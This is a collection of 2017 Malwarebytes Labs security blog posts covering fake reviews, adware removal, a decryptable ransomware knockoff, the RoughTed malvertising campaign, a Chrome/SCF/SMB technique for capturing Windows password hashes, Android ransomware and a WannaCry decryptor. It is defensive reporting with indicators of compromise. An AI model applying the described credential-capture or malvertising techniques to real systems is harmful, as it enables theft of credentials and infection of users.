Techie Feeds

Spotting fake reviews – have healthy online skepticism

Malwarebytes - Thu, 06/01/2017 - 14:00

One of the most often pieces of advice I give when speaking to friends and relatives regarding online threats is to research it.

Performing a simple Google search on a product, a strange phone number, or a business, can reveal a wealth of data that can then be used to make an informed decision about what actions to take. And here is where we get to the crux of it all. Just as we now have to contend with “fake news,” some of the information unearthed by web research will be wrong, contain mistakes, or even attempt to deliberately mislead you.

Let’s take an example we often hear about:

  • A user has a computer problem.
  • They perform a Google search in an attempt to find a solution.
  • The results point them to the apparent official technical support for the product they are having issues with.

*Attentive readers will notice that we have touched on this subject in the past.

This is where a careful user should do a little bit of research

A simple Google search of “company name + scam” will often turn up some valuable information. A company that has pages upon pages of customer complaints should raise some red flags.

Some examples of the websites that Google displays when you perform such a search are repositories of customer experiences, such as the online presence of the Better Business Bureau,, and even the official Facebook page of said business to name a few. Perusing these complaints will help give you an idea of the trustworthiness of a business. Going the extra mile and doing this research also gives you the time to think about the service you are looking at purchasing. This mitigates being rushed in your decisions.

Sometimes, legitimate users catch on!

Shills, sockpuppets, and personas

This research phase is also where we sometimes see a strange trend. A search on some of the websites that aggregate consumer complaints might show the first page of results filled with glowing reviews exhorting the awesome customer service they received.

Let’s stop and think about this. Why are random users taking the time to go register an account and fill a glowing review on a site that predominantly focuses on negative experiences? Only a small number of customers will go to the effort of filling out a review, much less a positive one.

This is an effort to artificially bury the negative reviews on these sites, as users rarely visit anything beyond the first page of results. These reviews are created by shills, either employed by the company affected by the negative reviews or by an online reputation management firm.

These are companies that specialize in online reputation management and have been hired to clean up negative comments that would otherwise be prominently be shown as the top search result. As an aside, any company that uses these techniques should fall victim to the “Streisand Effect” and immediately be viewed with extreme suspicion.

Spot the fakes

Some review sites will let you gather a little intel on the authors of reviews. Here are a few pointers for spotting fake ones:

  • Are all the positive reviews created on the same date? Organic reviews would be created at different times, fake ones might be done manually or programmatically in a short time frame.
  • Look for the age of the accounts with positive reviews. Real accounts would be created at different times, on different dates. Again, fake ones might be done manually or programmatically in a short time frame.
  • How many reviews do the accounts have? A real user might make reviews for several sites and services. A shill will almost only ever do the one. Maintaining a myriad of sockpuppet accounts is difficult.
  • Do they use a boilerplate? Are there multiple reviews with identical text from supposedly different authors? Boilerplates are a dead giveaway that there’s some reputation management going on.
  • Try pasting the review, or a portion of the text used in the review, in Google and searching for it. If the results turn up in multiple different reviews on different review sites, you have found a boilerplate!
  • If the first page of reviews is filled with positive comments, buck the trend and check the 2nd and 3rd pages. Reputation management outfits know almost no one checks past the first page. Valuable true negative comments often appear there.
  • Read the positive reviews carefully. Are they super polished? Perfect grammar? Real humans write in a way that is difficult to emulate. A boilerplate, or a professional shill, would have proofread the review and removed typos.
  • Beware of some review sites. They might be an advertisement for a specific product cleverly disguised as a review site!
  • Some reviews are solicited by the technician, only when there is a positive interaction, effectively drowning the review site with genuine positive interaction reviews. This becomes apparent when there’s an unusually large amount of reviews for the website/service.

There are no hard rules in detecting fake reviews and some real ones might exhibit the symptoms of fake reviews and vice versa. A good indicator is critical mass. If there are multiple dubious examples on the review site, you should take all the reviews on the site with a grain of salt.

Attempting to manage negative reviews by having a brigade of sockpuppets bury them with fictitious positive ones is in itself a good indicator of malfeasance.

Identical text across multiple reviews, with different users, review creation date, and geographical location.

Identical text across multiple reviews, with different users, review creation date, and geographical location.

1140 positive reviews! An example of flooding.

On the honesty of review sites

As if the waters were not murky enough, the review sites themselves sometimes have a financial stake in either showing negative reviews or conveniently hiding them. Some review sites have been repeatedly accused of providing preferential treatment to businesses that subscribe to their services. Others have been compared to a shakedown or strong-arm techniques based enterprise.

Subscribe to our service, buy advertising space on our site, pay for a membership… Do this and the negative reviews will be buried several pages in, away from view.

This subject alone could fill a separate article.

Reviews, complaint boards, and Google searches are powerful tools at your disposal to help in the decision process when evaluating a service. Having robust online skepticism will help preserve this skill, despite less than reputable online presence management shenanigans.

As always, stay safe, and if you have ever encountered shill reviews, please share them in our comments!

Jean Taggart

The post Spotting fake reviews – have healthy online skepticism appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware the series, part 4

Malwarebytes - Wed, 05/31/2017 - 14:00

In this series of posts, we will be using the flowchart below to follow the process of determining which adware we are dealing with. Our objective is to give you an idea of how many different types of adware are around for Windows systems. Though most are classified as PUPs, you will also see the occasional Trojan or rootkit, especially for the types that are more difficult to detect and remove.

Scheduled Tasks and Services

Two popular methods to deliver advertisements to your computer at regular intervals are Scheduled Tasks and Services. Both can easily be used to set a timer and show you a new advertisement at a set interval. The interval can be hours or mere minutes. For the advertiser, an interval in the range of hours has the advantage of being more inconspicuous as the user may close the advertisement and think nothing more of it. But a short interval brings in more money if you get paid by the impression (or by the number of unique views).

Scheduled Tasks

The Windows Task Scheduler is like an alarm clock that you can set, to start a procedure under specified circumstances. You can set them to start at a certain time, and repeat at a set interval, or you can set them to start at a certain occasion, most commonly when the computer boots up. Scheduled Tasks are the containers, that hold the information about what has to happen and when. Since the introduction of Task Scheduler 2.0, Scheduled Tasks have the format of XML files and the job extension.

Once you are aware of the fact that a Scheduled Task is responsible, it is pretty easy to remove them. Be aware that they tend to come in small groups (2 or 3 tasks is what we’re used to seeing in most cases).

How to open the Task Scheduler Windows XP and Windows 7

To open Scheduled Tasks, click Start, click All Programs, point to Accessories, point to System Tools, and then click Scheduled Tasks.

Windows 8 and Windows 10

Use the Search option to search for “Schedule” and choose “Schedule Task” to open the Task Scheduler.

Identify and delete a Scheduled Task

In the list of Scheduled Tasks find the ones that trigger the process associated with the advertisements. You can find the process name under the Action tab. Note that there may be switches set behind the filename like in the example below (GoogleUpdate.exe is the file name).

Select the Scheduled Task in the overview window and use the Delete option to remove it.

That’s all there is to it. As you can tell from the above, identifying the culprit as a Scheduled Task is the hardest part here. Removing Scheduled Tasks is easy enough once you are sure what to get rid of.


Windows services are programs that work in the background and many of them are crucial for the operation of the system, so be careful when you start disabling them. Also, make note of the following order since you may have to re-enable them in the reverse order. Many services depend on others and are unable to run without the ones they depend on.

How to open the Services console

To see the list of services run services.msc in your Run prompt or from your search box.

Identify and disable a Service

If you right-click a line in the list of services and click Properties, you can see the path to the executable on the General tab.

When you have found the service that is responsible for the advertisement, you can Stop the service on that same tab and set the Startup type to Disabled.

That should stop the advertisements and prevent the service from starting again. If it does start again, there are other processes involved and you may be dealing with a rootkit. More about those later.

Index Part 1
  • Identify the process
  • Clear browser caches
  • Remove browser extensions
Part 2
  • Proxies
  • Winsock hijackers
  • DNS hijackers
Part 3
  • Type of software
  • Uninstall
  • Remove file
  • Replace file
 Part 4
  • Scheduled tasks
  • Services
Up next, part 5
  • DLL’s
  • Handles
  • Parent process


Pieter Arntz

The post Adware the series, part 4 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 22 – May 28)

Malwarebytes - Mon, 05/29/2017 - 17:48

Last week we informed you about several new threats, including the android ransomware that targets Tencent users. This SLocker.fh masquerades as various legitimate apps to fool users into accepting escalated rights.

Or how about the potential danger of spilling Windows credentials for Chrome users. All they need you to do is to visit their site.

Some of these threats are so unsettling they even frighten us. We listed 5 cyberthreats to keep an eye on.

Also we brought you up to speed about RoughTed, a malvertising campaign that is is unique for its considerable scope ranging from scams to exploit kits, targeting a wide array of users via their operating system, browser, and geolocation to deliver the appropriate payload.

Other noteworthy news in cybersecurity:

Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (May 22 – May 28) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A stolen version of DMA Locker is making the rounds

Malwarebytes - Mon, 05/29/2017 - 14:21

Ransomware has become a popular criminal business with a relatively easy entrance. Even the people with little technical knowledge can build their own ransomware based on open source code, that has been published on the internet some time ago. Nevertheless, cybercriminals keep stealing, not only from victims, but also from each other. Some time ago we heard about PetrWrap – a ransomware build upon a binary of the infamous Petya. But that is not  the only case. For some time, we have been observing a threat actor who distributes patched DMA Locker binaries.

Real or stolen DMA Locker – why would you care?

The observed samples of the stolen version of DMA Locker have been built based on one and the same instance of DMA Locker – so, they carry inside the same public key. This implies, that all the victims of this version can get their data back with the help of the same private key. And now comes the best part: we have this key and we distribute it for free to all affected persons.

If you are a victim of the fake DMA Locker, you can send e-mail with samples of you encrypted files to:

How to recognize the stolen versions?

Since the fake DMA Locker is based on the binary of the original DMA Locker 3.0, they have exactly the same GUI – only the keywords referring to DMA Locker has been removed:

The main difference between the original and stolen DMA Locker is a different marker at the beginning of the encrypted file. While the real DMA Locker prefixes content with: !DMALOCK, the stolen version have many different prefix patterns. Some we have observed are:

  • !XPTLOCK5.0
  • !Locked#2.0
  • !Locked!###
  • !Encrypt!##

However, the threat actor changes them periodically – so, anything that is different from the standard pattern may suggest that we are dealing with the “pirated”, decryptable version.

Example of file encrypted by the fake DMA Locker:

What are the chances to get the data back?

Up to now we managed to help 100% of the known victims of the fake DMA Locker. So far, the threat actor responsible for distributing it, has not changed the key – so, the prospects of getting data back are still big. However, the chance to get help drastically shrink in case you were attacked with the legitimate DMA Locker, which may look the same at first sight.

How to prevent the attack?

Distributors of the fake (as well as the original) DMA Locker enter the victim machine via hacked Remote Desktop. Thus, we recommend paying attention if you have Remote Desktop open and if so, if it is properly secured.

Analyzed sample – fake DMA Locker, adding “!Encrypt!##” prefix.


Currently in distribution is version 3.0 of DMALocker, since the development of 4.0 was abandoned. Read more about our research:

DMA Locker 4.0: Known ransomware preparing for a massive distribution

The post A stolen version of DMA Locker is making the rounds appeared first on Malwarebytes Labs.

Categories: Techie Feeds

RoughTed: The anti ad-blocker malvertiser

Malwarebytes - Thu, 05/25/2017 - 14:00

RoughTed is a large malvertising operation that peaked in March 2017 but has been going on for at least well over a year. It is unique for its considerable scope ranging from scams to exploit kits, targeting a wide array of users via their operating system, browser, and geolocation to deliver the appropriate payload.

We estimate that the traffic via RoughTed related domains accumulated to over half a billion hits and was responsible for many successful compromises due to effective techniques that triage visitors and bypass ad-blockers.

The threat actors behind RoughTed have been leveraging the Amazon cloud infrastructure, in particular, its Content Delivery Network (CDN), while also blending in the noise with multiple ad redirections from several ad exchanges, making it more difficult to identify the source of their malvertising activity.

  • Traffic comes from thousands of publishers, some ranked in Alexa’s top 500 websites.
  • RoughTed domains accumulated over half a billion visits in the past 3 months alone.
  • Threat actors are leveraging fingerprinting and ad-blocker bypassing techniques upstream.
  • RoughTed can deliver a variety of payloads for each platform: scams, exploit kits, and malware.
Campaign identification

While studying the Magnitude exploit kit, we came across an interesting redirection chain from a domain name called roughted[.]com, hence the nickname ‘RoughTed’ we gave to this threat actor and campaign.

This domain was calling out to an XML feed to serve ads, but because of our geolocation at the time (South Korea), we were redirected to the Magnitude exploit kit via its pre-filtering gate, also known as ‘Magnigate’.

Over the course of a few days, we noticed a similar referer as roughted[.]com, with the same URL structure redirecting to the RIG exploit kit this time. Upon mining our data set, we started seeing that pattern for over a hundred other domains and mapped out some of the most prolific ones.

Numbers above added up from analytics.

The majority of the domains were created via the EvoPlus registrar in small batches with a new .ru or .ua email address each time. Another thing in common that these domains have is that they are being used as a gateway meant to bypass ad-blockers (we will expand on that aspect later).

The visualization below shows clusters representing domain names assigned to a unique registrant email.

Within each cluster, we can see that the domain naming convention follows a certain pattern, with one or two strings being used in various positions. For example, below we have the strings ‘get‘ and ‘fun‘ used to build the domain name.

This is in itself is not shocking (it could simply be a lack of imagination) but it becomes interesting when two separate clusters are semantically related (different registrant email but similar domain names). This allows us to connect the campaigns together in yet another way (besides the URI patterns).

For instance, let’s zoom in on two clusters that show different email addresses. We see that the common string here is ‘parser‘ used in both and it is not just a ‘coincidence’.


The term ‘publisher’ is commonly used in the advertising industry to refer to websites that display adverts to generate online revenues. Publishers are typically providers of content (news, media files, etc.) which drive people to visit them regularly. The cost of advertising is not only dependent on how popular a website is, but also on other variables which revolve around the kind of audience a publisher captures.

The bulk of the traffic for the RoughTed campaign comes from streaming video or file sharing sites closely intertwined with URL shorteners. These are areas where malicious actors love to lurk because of the sheer volume of traffic but also subpar standards for quality and safety of online advertising.

Below are some domains we spotted in our telemetry, ranking within Alexa’s top 1000. Visitors to these sites are targeted with ads and in some cases, some that belong to the RoughTed campaign. We will detail later to what kind of content users were exposed.

During our research, we spoke with Denis Sinegubko from website security company Sucuri who shared similar findings with how ‘personal’ websites were involved in this malvertising campaign. Webmasters knowingly integrated an ad code script from advertising company Ad-Maven into their pages in order to monetize their website.

The obfuscated script above contains an algorithm to generate future Amazon S3 URLs, but the buckets are only created for the next 3-5 days.

Each bucket contains a base64 encoded blurb which decodes to the current subdomain:

We have many examples of these subdomains (leveraging the Amazon’s Content Delivery System, Amazon CloudFront CDN) seen as a referrer to RoughTed domains in our telemetry as well:

Refer: ->{redacted}.&v= Fingerprinting and ad-blocking evasion techniques

There’s more within this code and it has been raising eyebrows for its invasive nature, in particular for its use of fingerprinting techniques, in that case, ‘canvas fingerprinting’.

We can see it below again in a slightly different format (admvn.js) used by the URL shortener site and redirecting users to a RoughTed domain (

The point is to profile users with great granularity and identify those that may be cheating the system by lying about their browser or geolocation.

Typically the User-Agent string can determine a visitor’s OS and browser but it’s trivial to fake the UA and lie to the server. One clever alternative is to look for installed fonts since they are specific to certain operating systems, i.e. a Mac user will have different fonts than a Windows user (thank you Manuel ‘The Magician’ Caballero for pointing out this trick).

Another interesting aspect is that redirections to RoughTed domains seem to happen even to those running ad-blockers and that was reported by users of Adblock PlusuBlock origin or AdGuard.

The animation below shows a redirection to one of the RoughTed gates that bypass the ad blocker in Google Chrome (ABP is shown installed and activated at the top right) and ultimately pushes a bogus Chrome extension. All a user has to do is click anywhere on the first page they visited and their browser will become hijacked.

Something for everyone

This malvertising campaign is quite diverse and no matter what your operating system or browser are, you will receive a payload of some kind. Perhaps this should be something for publishers to have a deep hard look at, knowing what they may be subjecting their visitors to if they decide to use those kinds of adverts.

Adware for Mac

This is a fake Flash Player update that targets Mac users and tricks them into believing that the file comes from Apple. As a rule of thumb, you should really only download software updates from the original manufacturer, not some third-party. Unfortunately, crooks can easily create deceiving pages or scare users into installing a fraudulent piece of software.

Traffic view

PUPs for Windows

There are countless fake updates for Flash, Java, not to mention all those ‘special’ codecs for Windows. The following page urges users to install a Java update which is laced with adware. When it comes to Java, it’s usually better not having it in the first place, let alone installing some shady updates.

Traffic view

Rogue Chrome extensions

There is no question that Chrome is one of the safest browsers but unfortunately, malware purveyors and other ill-intent advertising companies are aggressively pushing rogue extensions that can collect or even modify the data on the sites you visit. Malvertising is a prime distribution method for bogus Chrome extensions which are pushed in a forceful way, leaving users little choice but to install them, in some cases.

Traffic view

Undesired redirections to iTunes/app store

There is a large quantity of ‘free’ apps out there, both for iOS and Android and their business model is either via in-app adverts or add-ons you can purchase. Some apps go one step too far by making the game too hard to beat without buying a certain item (this is also known as ‘pay-to-play’). But after all, it is up to users to make that choice to download those apps and opt for such purchases.

However, malvertising murks the waters by doing some automated redirections to some ‘random’ apps and generating commissions for each install.

Traffic view

Tech support scams

Tech support scams have long been feeding off malvertising and targeting many different countries. Therefore it’s not surprising to see cases here via RoughTed as well.

Traffic view

Security researcher Malekal tweeted about a Tech Support Scam (TSS) campaign targeting French people. He points at the heavily obfuscated code and we can spot a RoughTed domain ( in his screenshot within the HTTP traffic.

Surveys and other scams

Fake surveys or lottery pages are also common place via malvertising. In this particular sequence, we ran into NoTrove (a campaign first reported by RiskIQ).

Traffic view

Exploit kits

According to our telemetry records, the majority of victims impacted by exploit kits via the RoughTed malvertising campaign were in the US and Canada, followed by the U.K., Italy, Spain, and Brazil.


One very active malware campaign as of late is known as “Seamless” and has pushed a lot of the Ramnit banking Trojan, especially to Canadian users. It is easily recognizable by its use of IP-Literal hostnames that redirect to the RIG EK infrastructure.

Much of the upstream traffic comes from adult portals and popunder ad networks. Here you can see RoughTed involved in the ad call and chain via interesting multi-step hops leading to the Seamless campaign.

If you want to check the full redirection flow, please click here.

Magnitude EK

Magnitude EK has long been faithful to the Cerber ransomware as its dropped payload of choice. The bulk of infections are happening in South Korea, some in Taiwan and Hong Kong, and curiously, a few in Italy. The screenshot below is an example of a Cerber infection on a Korean user via the Magnitude exploit kit.

Traffic view

Same old, same old

Malvertising may look easy on the surface but is actually a much more complex and deep-rooted issue. We all know that it’s there and whenever a big case is uncovered, ad networks (and publishers) are blamed and it somewhat taints their brand for a little while.

But for the most part, malvertising continues unabated, especially with certain providers. The response from end users has traditionally been to gravitate towards ad-blockers as a means to avoid getting infected or bothered by obnoxious adverts.

Naturally, this has caused a similar knee-jerk reaction by some publishers and ad companies to fight back in various ways to protect their business. The rationale behind it is that people shouldn’t be getting free content that costs them money to come up with and host.

The use of dynamically created scripts to perform redirections that bypass ad-blockers are clever in many ways. For one, when a publisher includes the code on their site, it is unique to them as it is generated in their own dashboard, and by the same token, it is less likely to be detected. The script itself pulls data from a new URL every day which means blocking new domains is truly a cat and mouse game that guarantees a sufficient enough up time to serve up ads.

It becomes a real issue when this ad-supported content pushes scams or malware, even to those running an ad-blocker. At this point, one should ask themselves who really is responsible: ad networks (which are fending for themselves) or publishers (and site owners) that knowingly expose their visitors to nefarious code for the sake of ad revenues.

Thanks to Denis from Sucuri for sharing his insights into injected adverts in personal websites.

Indicators Of Compromise (IOCs)

Regex to detect RoughTed campaign


Top RoughTed domains (by traffic)

A longer list can be found here.

Mac PUP (FLVPlayer.dmg)


Windows PUP (VideoPlayerSetup.exe)


Chrome extension (ABP bypass)

Chrome extension (SearchApp)

iTunes redirection

Tech support scam


Method,IP address,Domain name,Comments,,RoughTed,,Redirection,,Malvertising,,Malvertising POST,,,Seamless_Campaign_URL,,Malvertising,,Seamless_Campaign_URL,,Seamless_Campaign_URL,,RIG_EK_URL (Flash Exploit),,RIG_EK_URL (Landing Page),,RIG_EK_URL (Malware Payload) Ramnit: cc4c5eabb76ebca1bc3af1d8e8a6629e72164f9ae0fc61287592548288937220

Magnitude EK

Method,IP address,Domain name,Comments,,RoughTed,,Malvertising,,Magnigate,,Magnigate,,Magnitude_EK_Code (Landing Page),,Magnitude_EK_URL (Flash Exploit),,Magnitude_EK_URL (Kernel32 call),,Magnitude_EK_URL (Malware Payload) Cerber: d9411664ad6f1451b7cbd2a9453e5824d566535bae480dfe533cda7e0bef0ae7

The post RoughTed: The anti ad-blocker malvertiser appeared first on Malwarebytes Labs.

Categories: Techie Feeds

5 Unsettling cyberthreats

Malwarebytes - Wed, 05/24/2017 - 18:39

Cyberthreats are typically boring, repetitive, and require a reasonably predictable remediation process. A SQL injection is a SQL injection, no matter who’s trying it.  But what about the outliers? What about threats that impact you, but you can’t remediate, or establish a policy to cover?

Here are 5 cyberthreats that if you’re not frightened by, you should be.

  1. VNC roulette. This was a website that scanned for computers that allowed for remote sessions, but were unsecured by passwords or encryption. A fair amount of screenshots the site collected were from average users who simply failed to set up proper security settings. But there were also machines for which that failure was much more serious, like SCADA systems, CCTVs, and water treatment plants.


  1. A public drone feed? Last week a security blogger discovered what appeared to be a publically accessible Predator drone feed. As it turned out, the video was actually an unclassified demo page created by a defense contractor using a misconfigured web server. While not exactly the OPSEC blunder viewers thought, the amount of critical infrastructure exposed to the internet and managed via unaccountable third parties is food for thought.


  1. Mirai botnet. Used in some of the largest DDoS attacks ever, including one to silence Brian Krebs, Mirai scans the internet for Internet of Things devices using factory default credentials and infects them. What’s the scope of a Mirai attack? Ars technica reported a Mirai DDoS on French web host OVH of 1.7 terabytes.  That’s not the scary part. The scary part is that the IoT market is booming, they have one of the most abysmal records of security engineering and poor judgment ever seen. And as of 2016, the most conservative estimation for IoT devices on the market was 6.4 billion.


  1. RATs. Some of us are familiar with remote access tools used to spy on the unwitting and sometimes take compromising pictures. But what happens when a RAT is embedded in a SaaS tool? Tech Support scammers have been hit by third-party business services who sold their service with an extra addition of DarkComet. Given how tough it can be to vet a SaaS offering, the potential to impact legitimate businesses is very large.


  1. The Computer Fraud and Abuse Act. Nobody likes fraud and abuse, so what’s the big deal an act designed to keep them off of computers? Well, the act was written in 1986, prompted by a White House screening of the movie WarGames (no, really) and criminalized those who

“having knowingly accessed a computer without authorization or exceeding authorized access”

That bold part has proved problematic in recent years, as the automated scraping of content, saving public data that the owner didn’t intend to make public, and landing on unexpected pages due to a web sites misconfiguration have all been interpreted as violations of the law at one point or another. This is absolutely scary, as the act and its capricious enforcement have led to a chilling effect over vulnerability disclosure and introduced a risk to researchers who might otherwise work with law enforcement.

These are all scary cyberthreats not because of their technical sophistication, but more because they are failures of organizations and institutions that manage technology. Your security team can patch a zero-day vulnerability, but not the executive that insists his password be set to ‘1234’ for ‘convenience.’ When you have strong organizations, the cyberthreats you face suddenly get much less scary.

The post 5 Unsettling cyberthreats appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stealing Windows credentials using Google Chrome

Malwarebytes - Tue, 05/23/2017 - 14:00

Security researcher Bosko Stankovic recently published an article explaining how an attacker could use Chrome, the SMB file sharing protocol, and Windows Explorer Shell Command File to steal victims credentials.

The basic elements Chrome

Similar attacks have been demonstrated using Internet Explorer and Edge, but being able to do this with a (very popular) third party browser increases the chances of this being used in the wild by a lot. Chrome uses a technique called MIME-sniffing for files with a text or text-like content and downloads files that contain a non-printable character. It downloads these files to the default download folder as specified in the Advanced Settings section of the Chrome Settings.

SMB protocol

This file sharing protocol recently gained a lot of fame by being exploited to spread the WanaCrypt ransomware worm. This protocol is what Windows uses to share files, printers, serial ports, and communicate this information between computers. By intention clients make SMB requests and servers make the resources available after successful authentication. But as it turns out, this feature can be (ab)used for a lot more.

SCF files

Windows Explorer Shell Command File are basically shortcuts with a run command. A very noteworthy feature is that this extension is invisible even if you have your extensions set to show.

So you will have to take a really close look at a file that has a double extension like example.txt.scf to see the difference with an actual txt file.


Another thing that makes SCF files dangerous is that they are triggered as soon as the folder they are in is opened. Windows will send a request for the resource the very moment the file is showing in Windows explorer.

The possible attack

The attacker plants an SCF file containing a non-printable character on a website that he knows his victim(s) frequents (watering hole attack). Or if the threat actor is after a bigger audience he can rig a malvertising campaign or use social media.

Chrome users will get the SCF file downloaded to their default downloads folder and the next time they want to look at or move a file from that folder, the SCF file will be triggered as soon as the downloads folder is opened in Windows Explorer.

As explained, SCF files can be configured to contact a server with a request for resources (i.e. a file). There are no restrictions so this can be a remote server under control by the attacker. In order to make the resource request, it will need to send an authentication request via SMB, which can be captured on the server. The request would include the victims’ username, his domain, and the NTLMv2 password hash. This information can be extremely useful for an attacker who wants to expand his foothold on a network.

The consequences

Once the attacker has the hashed password it depends on the strength of the hash for how long it takes to find out the password. This can vary from mere seconds to a few days. In targeted attacks, you can be sure the username and hash will be checked against lists published after breaches to see whether a password has been re-used and can be matched with the hash even faster.

If the Windows 8/10 user is using Microsoft Authentication (MSA) to use Microsoft services like Office 365, OneDrive, Skype, and many others, the impact on the victims can be even bigger.


You probably heard this before this week, but if you don’t need SMB, disable it. This is the only part of the attack chain the end-user can easily manipulate by executing a simple Powershell command. Other options are:

  • To always use the “Save as… ” option when you are knowingly downloading something, so you’d never have to open the default downloads folder.
  • Alter the file association for SCF files, which you would have to do in the registry. Changing the default value under the key HKEY_CLASSES_ROOT\.scf “ txtfile” makes the files visible and opens it in notepad.

But disabling SMB is more likely to be successful and it helps protect you against other malware like the WannaCry ransom worm and the Adylkuzz cryptocurrency miner.


This article explains how Chrome users are at risk of spilling their Microsoft Authentication credentials by simply visiting the wrong site.


Pieter Arntz

The post Stealing Windows credentials using Google Chrome appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Ransomware targets Tencent users

Malwarebytes - Mon, 05/22/2017 - 14:00

Early this April, an increase of infection rates by a variant of ransomware known as Android/Ransom.SLocker.fh was seen.

Ransomware targets Tencent users

An especially relevant trait of SLocker.fh is its use of Tenpay to send payment to the criminals. Tenpay is an integrated payment platform by Tencent — China’s largest Internet service portals. Thus, it is no surprise that SLocker.fh originates from China.

In order to pay, users must have a QQ ID to send payment; which is provided.  Since Tencent’s most popular platform is QQ Instant Messenger, the criminals are probably targeting these users the most.

Various iterations to fool users

Like many Android ransomware apps, SLocker.fh masquerades as various legitimate apps to fool users into accepting escalated rights. Users who accept the escalated rights will have their device forced to reboot.  After reboot, users will have their device locked with overlaying screen with instructions to pay.

Click to view slideshow. Click to view slideshow. Stay protected

Because Android ransomware is on the rise, users should be extra cautious. You can protect yourself by being cautious of giving superuser and/or device administrator rights to any app that asks for it. If the app looks shady like the two example above, this is especially true.

So you’re infected with ransomware

A good anti-malware scanner like Malwarebytes Anti-Malware Mobile can remove the ransomware, but only BEFORE escalated rights are granted. Afterward, it becomes a bit harder. For how to remove such infections, refer to blog post “Difficulty removing Koler Trojan or other ransomware on Android?

As always, stay safe out there.

The post Mobile Menace Monday: Ransomware targets Tencent users appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 15 – May 21)

Malwarebytes - Mon, 05/22/2017 - 13:59

Last week was dominated by the WannaCry ransomware and the discussions ensuing it. We published:

Others discussed:

In other news we celebrated Privacy Awareness Week, highlighting the two main themes:

  1. Share with care.
  2. Trust and transparency.

And we gave out some pointers on what to consider and how to act when you have reason to believe that your personal information was stolen.

Other important security news:

  • Researchers from Carnegie Mellon University, Seagate, and the Swiss Federal Institute of Zurich published a paper entitled “Vulnerabilities in MLC NAND Flash Memory Programming: Experimental Analysis, Exploits, and Mitigation Techniques.” Our friends at Bleeping computer explained the found vulnerability of SSD drives.
  • A Croatian security investigator has discovered a new network worm that uses 7 tools and exploits from the US intelligence service NSA. The worm is called EternalRocks, but its original name is “MicroBotMassiveNet“.
  • Wikileaks has brought out information about other CIA tools called Athena and Hera, spyware designed to take full, remote control over infected Windows PCs.

In non-security news, we were amazed by this jewel telling us that scientists at UCLA and the University of Connecticut managed to create a protein-based battery-like device that extracts energy from the human body which could potentially be used to power implants like pacemakers.

Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (May 15 – May 21) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

WannaDecrypt your files? The WannaCry solution, for some

Malwarebytes - Fri, 05/19/2017 - 20:11

We just wanted to shoot out a quick blog post to let you know about a decryptor (Wanakiwi) that has been developed for WannaCry/WannaCrypt/wCrypt. There is a catch though, it only works for the following operating systems:

  • Windows XP
  • Windows Server 2003
  • Windows Vista
  • Windows Server 2008
  • Windows Server 2008 R2
  • Windows 7

So if you’ve got a WannaCry infection on one of the above operating systems, there is hope!


The decryptor is only going to work if you haven’t restarted the infected system and you haven’t killed the ransomware process (should be wnry.exe or wcry.exe) so please don’t restart or kill the process if you want to get those files back!


In order to use this tool, you first need to download it from here.

This tool essentially searches the system’s memory for prime numbers and pieces together the encryption key used. However, it relies on current running memory so once you reboot it will be gone and if you’ve done too much on the system since infection, it’s possible the key won’t be found (because it’s been overwritten by data from other applications using the same memory space).

To run it, download the linked file (above) and extract the .zip to a folder on your desktop, (if you can download the file from a clean system and then transfer it via USB, you run less risk of overwriting the key in memory).

Next, you can either double click it (boring) or open the command prompt (Start + CMD) and run it through there (fun!).

The tool will automatically identify the WannaCrypt applications running on the system if they are called wnry.exe or wcry.exe, but if for some reason they can’t find them, maybe check out the running applications on your system (Task Manager/Process Explorer) and find the offender (it’s pretty obvious), then identify the Process Identification Number (PID) and you can just plug that into the command prompt after wanakiwi.exe.

It might take a few minutes for the tool to find the key (or many minutes in some cases), but once it’s found the tool is going to start searching your system for encrypted files and decrypt them automatically.


After the tool finishes decrypting your files, you are going to be left with a ransom note as a background and lots of encrypted files next to your unencrypted files.

Here are some possible next steps:

  • Download Malwarebytes 3.0 (or whatever scanning tool you prefer that can clean up WannaCry) and run a scan on the system to identify all artifacts related to WannaCry. This will help you get the malware off the system in case it tries to encrypt again.
  • Restart the computer to finish clean-up.
  • Find all the most important files you want to keep and move them to some form of backup.
  • Wipe the system and reinstall Windows.
  • OR you can just go through your system looking for all files with the .WNCRY extension and getting rid of them.

The original memory scrubbing, prime number searching WannaKey decryptor tool (for XP) was written by Adrien Guinet (@adriengnt) and then used as the base for Wanakiwi developed by Benjamin Delpy (@gentilkiwi). These guys are incredibly talented and deserve a round of applause!

We found out about the tool thanks to the very extensive blog post by Matt Suiche (@msuiche), which you should check out to get more information about how these tools work. You might remember Matt from his assistance in stopping a variant of the WannaCry released last week by registering the killswitch domain.


We didn’t want to write about this tool until we tested it in some capacity. A lot of other security researchers have given it a go and it seems that the tool works well in lab environments (sometimes). I personally tested it on a Windows 7 system using the following sample (with mixed results):


  • My first test worked like a charm.
  • My second test with a new profile (for taking screenshots for this post) couldn’t actually launch the malware.
  • My third test launched the malware, but the decryptor took forever and eventually never found the key.
  • My fourth test worked like a charm again (original profile).
  • Some of our other researchers tried it and were unable to get the tool to find the key.

This tool was put together very quickly and it’s meant to help those that it can help and that is likely not everybody. I wouldn’t recommend putting all your eggs in the basket that if you get hit, you couldn’t decrypt using this tool because either:

  • You are likely going to be unable to recover the key OR
  • The malware will modify to clean up the running memory or force a reboot after install to make the tool ineffective

But if you are currently dealing with a WannaCry infection, you have barely touched the infected system(s), and you are running one of the operating systems listed at the beginning of this post, running the tool is not going to break anything that isn’t already broken so it’s worth a shot just to see if you can get those files back.

That being said, once again big thanks to @adriengnt, @gentilkiwi & @msuiche for their hard work, information spreading and ingenious development skills.

Let us know in the comments if this tool worked for you (and your configuration too!)

The post WannaDecrypt your files? The WannaCry solution, for some appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How did the WannaCry Ransomworm spread?

Malwarebytes - Fri, 05/19/2017 - 14:00

Security researchers have had a busy week since the WannaCry ransomware outbreak that wreaked havoc on computers worldwide. News of the infection and the subsequent viral images showing everything from large display terminals to kiosks being affected created pandemonium in ways that haven’t been seen since possibly the MyDoom worm circa 2004.

